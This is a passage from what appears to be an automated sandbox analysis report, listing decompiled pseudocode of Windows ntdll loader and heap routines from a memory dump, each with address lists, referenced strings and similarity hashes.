												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0161F380(_t136, 0x15b1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E015F2280(_t108, 0x16c86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E016061A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E016A9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E015EFFB0(_t118, _t156, 0x16c86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01619A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x015e8799
0x015e879d
0x015e87a1
0x015e87a3
0x015e87a8
0x015e87c3
0x015e87c3
0x015e87c8
0x015e87d1
0x015e87d4
0x015e87d8
0x015e87e5
0x015e87ec
0x01639bfe
0x01639c00
0x01639c02
0x01639c08
0x01639c0d
0x01639c0f
0x01639c14
0x01639c2d
0x01639c32
0x01639c37
0x01639c3a
0x01639c3c
0x01639c42
0x01639c42
0x01639c3c
0x01639c02
0x015e87da
0x015e87df
0x015e87e3
0x00000000
0x00000000
0x015e87e3
0x015e87f2
0x00000000
0x015e87fb
0x015e87fd
0x015e87fe
0x015e880e
0x015e880f
0x015e8810
0x015e8814
0x015e881a
0x015e881c
0x015e881f
0x015e8821
0x015e8822
0x015e8824
0x015e8826
0x015e882c
0x015e882e
0x01639c48
0x01639c48
0x015e8834
0x015e8834
0x015e8837
0x00000000
0x00000000
0x015e8837
0x015e882e
0x015e883d
0x015e8840
0x015e8843
0x015e8846
0x015e8849
0x015e884c
0x015e884e
0x015e8850
0x015e8852
0x015e8854
0x015e8857
0x015e88b4
0x015e88b6
0x015e88b6
0x015e8859
0x015e8859
0x015e8859
0x015e8861
0x015e8866
0x015e886a
0x015e893d
0x015e8941
0x00000000
0x015e8947
0x015e8947
0x015e894a
0x015e894c
0x00000000
0x015e8952
0x015e8955
0x015e895a
0x015e895d
0x015e895d
0x015e895f
0x015e8961
0x015e8961
0x015e8968
0x00000000
0x00000000
0x015e896a
0x015e896b
0x015e896e
0x00000000
0x015e8970
0x015e8970
0x015e8970
0x015e8970
0x015e8972
0x015e8972
0x015e8974
0x00000000
0x015e897a
0x015e897a
0x015e897d
0x00000000
0x015e8983
0x01639c65
0x01639c6d
0x01639c72
0x01639c75
0x01639c75
0x01639c82
0x01639c86
0x01639c87
0x01639c88
0x01639c89
0x01639c8c
0x01639c90
0x01639c95
0x01639c97
0x01639ca0
0x01639ca3
0x01639ca9
0x01639ca9
0x00000000
0x01639ca9
0x01639ca3
0x00000000
0x01639c97
0x015e897d
0x00000000
0x015e8974
0x015e8988
0x015e8992
0x015e8996
0x00000000
0x015e8996
0x015e894c
0x00000000
0x015e8870
0x015e887b
0x015e887d
0x015e887f
0x015e8881
0x015e8884
0x015e8884
0x015e8886
0x015e8889
0x015e888c
0x015e888e
0x015e8891
0x015e8891
0x015e8898
0x00000000
0x00000000
0x015e889a
0x015e889b
0x015e889e
0x00000000
0x00000000
0x015e88a0
0x015e88a8
0x015e88b0
0x015e88b2
0x015e88d3
0x015e88d5
0x00000000
0x015e88d7
0x015e88db
0x015e88dc
0x015e88e0
0x015e88e8
0x015e88ee
0x015e88f0
0x015e88f3
0x015e88fc
0x015e8901
0x015e8906
0x015e890c
0x015e890c
0x015e890f
0x015e8916
0x015e8917
0x015e8918
0x015e8919
0x015e891a
0x015e891f
0x015e8921
0x01639c52
0x01639c55
0x01639c5b
0x01639cac
0x01639cc0
0x01639cc0
0x01639c55
0x015e8927
0x015e8927
0x015e892f
0x015e8933
0x00000000
0x015e88f5
0x015e88f5
0x00000000
0x015e88f7
0x015e88f7
0x015e88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x015e88fa
0x015e88f5
0x015e88f3
0x00000000
0x015e88d5
0x00000000
0x015e88b2
0x015e88c9
0x00000000
0x015e88c9
0x015e887f
0x015e886a
0x015e8857
0x015e8852
0x015e88bf
0x015e88bf
0x015e87aa
0x015e87ad
0x015e87ae
0x015e87b4
0x015e87b5
0x015e87b6
0x015e87b8
0x015e87bd
0x015e87c1
0x015e87f4
0x015e87fa
0x00000000
0x00000000
0x00000000
0x015e87c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01639C18
minkernel\ntdll\ldrsnap.c, xrefs: 01639C28
LdrpDoPostSnapWork, xrefs: 01639C1E

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 6a60ad45cfe83c259e7faeff4a9c2a4b06c65d2062c95db6b772483f281d825b
Instruction ID: ada93feaa86c934aa24c7dd7e28f2edc3c5dc6f637a0eac048146e61c519104e
Opcode Fuzzy Hash: 6a60ad45cfe83c259e7faeff4a9c2a4b06c65d2062c95db6b772483f281d825b
Instruction Fuzzy Hash: E891EE71E002169FEB2CDF59D884ABEB7F6FF84314B184569D905AF241DB70E902CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0160AC7B, Relevance: 4.0, Strings: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0160AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0162D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x16c8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E016196E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E01683C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E016196E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E015DB150();
							} else {
								E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E015DB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E016914FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E015F7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E01691411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E015F7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E01691411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}

0x0160ac85
0x0160ac88
0x0160ac8a
0x0160ac8d
0x0160ac91
0x0160ac99
0x0160ac9c
0x01649f57
0x01649f5b
0x01649f60
0x01649f60
0x0160aca8
0x0160acae
0x0160acda
0x0160acde
0x0160ace8
0x0160aceb
0x0160acee
0x00000000
0x0160acee
0x0160acf6
0x0160acb0
0x0160acb0
0x0160acbb
0x0160acbd
0x0160acc0
0x0160acc5
0x0160adae
0x0160adb4
0x0160adb4
0x0160acd4
0x0160acd8
0x0160acf9
0x0160acff
0x0160ad04
0x0160ad08
0x0160ad09
0x0160ad10
0x0160ad12
0x0160ad18
0x01649f6f
0x01649f74
0x01649f76
0x01649f7c
0x01649f84
0x01649f88
0x01649f89
0x01649f90
0x01649f90
0x01649f76
0x0160ad1e
0x0160ad24
0x0160ad26
0x0164a097
0x0164a09b
0x0164a0ba
0x0164a0bf
0x0164a09d
0x0164a0b2
0x0164a0b7
0x0164a0c5
0x0164a0c8
0x0164a0cb
0x0164a0d2
0x00000000
0x0160ad2c
0x0160ad2c
0x0160ad2f
0x0160ad34
0x0160ad36
0x01649f97
0x01649f9a
0x00000000
0x00000000
0x01649fa9
0x0160ad3e
0x0160ad3e
0x0160ad41
0x01649fb3
0x01649fb9
0x01649fc0
0x01649fd0
0x01649fd0
0x01649fc0
0x0160ad4a
0x0160ad50
0x0160ad5c
0x0160ad62
0x0160ad68
0x0160ad6b
0x0160ad6d
0x01649fda
0x01649fdd
0x00000000
0x00000000
0x01649fec
0x00000000
0x0160ad73
0x0160ad73
0x0160ad73
0x0160ad75
0x0160ad75
0x0160ad78
0x01649ff6
0x01649ffc
0x0164a003
0x0164a00e
0x0164a010
0x0164a01b
0x0164a01b
0x0164a01b
0x0164a038
0x0164a038
0x0164a003
0x0160ad84
0x0160ad89
0x0160ad8c
0x0160ad8e
0x0164a042
0x0164a045
0x00000000
0x00000000
0x0164a054
0x00000000
0x0160ad94
0x0160ad94
0x0160ad94
0x0160ad96
0x0160ad96
0x0160ad99
0x0164a063
0x0164a065
0x0164a070
0x0164a070
0x0164a070
0x0164a08d
0x0164a08d
0x0160ada4
0x0160ada6
0x00000000
0x0160ada6
0x0160ad8e
0x0160ad6d
0x0160ad3c
0x0160ad3c
0x00000000
0x0160ad3c
0x00000000
0x00000000
0x00000000
0x0160acd8

Strings

HEAP[%wZ]: , xrefs: 0164A0AD
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0164A0CD
HEAP: , xrefs: 0164A0BA

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: be1e62bede55496c192b1bb106f74fdf378b8a5a6926a8e5cb29c0d286487503
Instruction ID: 25fe378803c8d6419ef044bca90cf847581fe59a6a8d7185f57ae0499eaa073a
Opcode Fuzzy Hash: be1e62bede55496c192b1bb106f74fdf378b8a5a6926a8e5cb29c0d286487503
Instruction Fuzzy Hash: 8081D432240645EFD72ACBACCD94BAABBF8FB05754F0441A9E5518B7D2D774E940CB10

Uniqueness

Uniqueness Score: -1.00%

Function 015FB73D, Relevance: 3.9, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E015FB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E0169A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x16c8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E015DB150();
					} else {
						E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E015DB150();
					__eflags =  *0x16c7bc8;
					if(__eflags == 0) {
						E01692073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E0169A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x16c8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x16c8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E015FB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E0169A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E015FE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}

0x015fb746
0x015fb74b
0x015fb74d
0x015fb750
0x015fb755
0x015fb758
0x015fb758
0x015fb75e
0x015fb763
0x015fb764
0x015fb76a
0x015fb76d
0x015fb771
0x015fb776
0x015fb85c
0x015fb85d
0x015fb860
0x015fb865
0x01642ba1
0x01642ba2
0x01642ba9
0x01642bae
0x01642bae
0x015fb77c
0x015fb77c
0x015fb77c
0x015fb785
0x015fb788
0x01642bb6
0x01642bb9
0x00000000
0x00000000
0x01642bbf
0x01642bc5
0x01642bc9
0x01642be8
0x01642bed
0x01642bcb
0x01642be0
0x01642be5
0x01642bf3
0x01642bf8
0x01642bfd
0x01642c05
0x01642c0e
0x01642c0e
0x00000000
0x015fb78e
0x015fb78e
0x015fb78e
0x015fb791
0x015fb791
0x015fb797
0x015fb797
0x015fb79f
0x015fb7a9
0x015fb7af
0x015fb7af
0x015fb7b1
0x015fb7b6
0x015fb7e2
0x015fb7e2
0x015fb7e7
0x015fb880
0x015fb7ed
0x015fb7ed
0x015fb7ed
0x015fb7ef
0x015fb7f2
0x015fb7f2
0x015fb7f5
0x015fb7fa
0x01642c2d
0x01642c2e
0x01642c39
0x015fb800
0x015fb800
0x015fb802
0x015fb805
0x015fb808
0x015fb808
0x015fb80a
0x015fb80d
0x015fb816
0x015fb81c
0x015fb822
0x015fb82f
0x015fb88b
0x015fb892
0x015fb897
0x015fb899
0x015fb89b
0x015fb89e
0x015fb8a5
0x015fb8a8
0x015fb8aa
0x015fb8ac
0x015fb8ac
0x015fb8aa
0x015fb892
0x015fb831
0x015fb839
0x015fb83b
0x015fb83b
0x015fb844
0x015fb84b
0x015fb852
0x015fb7b8
0x015fb7ba
0x015fb7bf
0x015fb7c4
0x01642c18
0x01642c19
0x01642c23
0x015fb7ca
0x015fb7ca
0x015fb7cc
0x015fb7cf
0x015fb7d1
0x015fb7d1
0x015fb7d4
0x015fb7dc
0x015fb8bb
0x015fb8bb
0x015fb8be
0x015fb8be
0x015fb8c1
0x00000000
0x00000000
0x015fb8c3
0x015fb8c5
0x015fb8c7
0x015fb8e0
0x00000000
0x015fb8e0
0x015fb8cc
0x015fb8cc
0x00000000
0x015fb8cc
0x015fb8d6
0x015fb8d6
0x00000000
0x015fb7dc
0x015fb7b6

Strings

HEAP[%wZ]: , xrefs: 01642BDB
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 01642BF3
HEAP: , xrefs: 01642BE8

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 922c462d2a664b976b1b235c1e4cbad3ed6fe6701148b6d5020a9f549c19786c
Instruction ID: d10341d3f46d522b2bf83db0002b048ca7573027962eea2e18cc4d8ba73ea599
Opcode Fuzzy Hash: 922c462d2a664b976b1b235c1e4cbad3ed6fe6701148b6d5020a9f549c19786c
Instruction Fuzzy Hash: 3C61D470600242DFDB29DF28C885B6ABBF6FF44314F28856DE9498F245D770E891CB91

Uniqueness

Uniqueness Score: -1.00%

Function 015E7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E015E7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E015ECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E015DC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x16c5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01655510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x16c5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E015F7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E015F7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01657016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E015F7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E015F7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01657016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0160A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E015DB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x015e7e4c
0x015e7e50
0x015e7e55
0x015e7e58
0x015e7e5d
0x015e7e71
0x015e7f33
0x015e7e77
0x015e7e77
0x015e7e79
0x015e7e79
0x015e7e7e
0x015e7f45
0x01639848
0x00000000
0x01639848
0x015e7f4e
0x015e7f53
0x015e7f5a
0x00000000
0x00000000
0x0163985a
0x01639862
0x01639866
0x00000000
0x0163986c
0x00000000
0x0163986c
0x015e7e84
0x015e7e84
0x015e7e8d
0x01639871
0x015e7eb8
0x015e7ec0
0x015e7ec0
0x015e7e9a
0x0163987e
0x00000000
0x00000000
0x01639884
0x0163988b
0x016398a7
0x016398ac
0x016398b1
0x016398b6
0x016398b8
0x016398b8
0x016398b9
0x00000000
0x016398b9
0x015e7ea0
0x015e7ea7
0x00000000
0x00000000
0x015e7eac
0x015e7eb1
0x015e7ec6
0x015e7ed0
0x016398cc
0x015e7ed6
0x015e7ed6
0x015e7ed6
0x015e7ede
0x015e7ee3
0x016398e3
0x016398f0
0x01639902
0x016398f2
0x016398fb
0x016398fb
0x01639907
0x0163991d
0x0163991d
0x01639907
0x016398e3
0x015e7ef0
0x015e7f14
0x015e7f14
0x015e7f1e
0x01639946
0x015e7f24
